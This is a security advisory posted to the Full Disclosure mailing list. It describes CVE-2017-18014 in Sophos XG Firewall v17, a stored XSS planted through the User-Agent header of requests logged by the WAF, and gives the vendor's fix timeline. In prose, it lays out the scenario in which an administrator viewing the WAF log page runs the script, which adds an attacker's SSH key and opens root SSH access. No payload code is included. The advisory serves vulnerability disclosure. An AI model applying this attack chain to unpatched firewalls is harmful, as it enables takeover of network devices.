Full Disclosure mailing list archives
SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access
From: Maor Shwartz <maors () beyondsecurity com>
Date: Mon, 8 Jan 2018 08:29:02 +0200
SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access Full report: https://blogs.securiteam.com/index.php/archives/3612 Twitter: @SecuriTeam_SSD Weibo: SecuriTeam_SSD Vulnerability Summary The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access found in Sophos XG version 17. Sophos XG Firewall “provides unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls.” Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response - Sophos was informed of the vulnerability, their response was: - On December 11th, we both received and acknowledged your submission of the issue - On December 12th, we confirmed the issue and started working on a fix - On December 20th, we released the official fix in XGv17 MR3: https://community.sophos.com/products/xg-firewall/b/xg-blog/posts/sfos-17-0-3-mr3-released< /li> - On December 29th, we finished the automatic distribution of the fix backports to all previous releases of XGv16, v16.5, v17 - On December 31st, we published our security advisory with the acknowledgement as per your request: https://community.sophos.com/kb/en-us/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&elq=1514ab02d2764e8cb73e6b0bdbe7e7be&elqaid=2739&elqat=1&elqCampaignId=27053 CVE: CVE-2017-18014 Vulnerability details An unauthenticated user can trigger a persistent XSS vulnerability in the WAF log page (Control Center -> Log Viewer -> in the filter option “Web Server Protection”) in the webadmin interface which can be used to execute any action that webadmin of the firewall can (creating new user / ssh enabling and adding an ssh auth-key etc). In order to trigger the vulnerability we will demonstrate the following scenario: - Sophos XG Firewall will configured with 3 zones: Trusted, Untrusted, DMZ - A WEB server will be placed in DMZ - The firewall will protect the web server using Web Application Firewall (WAF) with default Sophos recommendation. - An attacker, from Untrusted network, will send a URL request to the web server in DMZ. This cause the injection of the script in the WAF logs page - An admin, from Trusted, will visit WAF log page - The script, without any other interaction or alert, will add an SSH auth-key to admin user and will allow ssh administration from Untrusted. - The attacker will get full root ssh shell The Sophos XG WAF log page will execute the “User-Agent” parameter in the POST request. -- Thanks Maor Shwartz Beyond Security GPG Key ID: 6D273779F52A9FC2
Attachment:
SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access.pdf
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access Maor Shwartz (Jan 09)